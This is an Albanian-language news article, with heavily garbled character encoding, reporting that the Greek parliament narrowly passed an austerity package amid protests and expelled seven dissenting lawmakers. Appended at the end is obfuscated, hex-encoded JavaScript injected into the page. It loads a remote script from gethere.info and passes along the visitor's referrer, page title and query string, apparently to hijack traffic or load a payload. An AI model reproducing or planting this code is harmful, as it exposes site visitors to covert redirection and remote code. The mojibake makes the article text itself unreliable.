largea_grece1352364872

Greqia miraton masat e reja tA� shtrA�ngimit

Parlamenti i GreqisA� ka votuar pA�r miratimin e masave tA� shtrA�ngimit, nA� mA�nyrA� qA� vendi i zhytur nA� borxhe tA� marrA� ndihma tA� mA�tejme nga huadhA�nA�sit e huaj dhe ta��i shmanget falimentimit.

LigjvA�nA�sit aprovuan masat me njA� shumicA� tA� ngushtA� nga 300 ulA�set e parlamentit. Paketa e masave tA� shtrA�ngimit, nA� vlerA� prej rreth 13.5 miliard eurosh, ka qenA� kA�rkesA� e huadhA�nA�sve, nA� mA�nyrA� qA� Greqia tA� marrA� paketA�n e radhA�s tA� ndihmA�s, nA� vlerA� prej 31.5 miliard eurosh.

Pa kA�to fonde, qeveria greke kishte paralajmA�ruar se do tA� mbeste pa para deri nA� mes tA� nA�ntorit.

Para votimit, me dhjetA�ra mijA�ra grekA� protestuan kundA�r kA�tyre masave, jashtA� ndA�rtesA�s sA� parlamentit.

Policia pA�rdori gaz lotA�sjellA�s kundA�r protestuesve, tA� cilA�t u pA�rplasA�n me policinA�.

Votimi i hershA�m i ditA�s sA� sotme tregoi edhe tendosje ndA�rmjet tri partive, partnere tA� koalicionit. MenjA�herA� pas votimit, dy nga kA�to parti, socialistA�t dhe partia e kryeministrit Samaras a�?Demokracia e Rea�?, pA�rjashtuan shtatA� ligjvA�nA�s nga partitA� e tyre, sepse ata nuk kishin votuar nA� favor tA� miratimit tA� masave tA� shtrA�ngimit.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}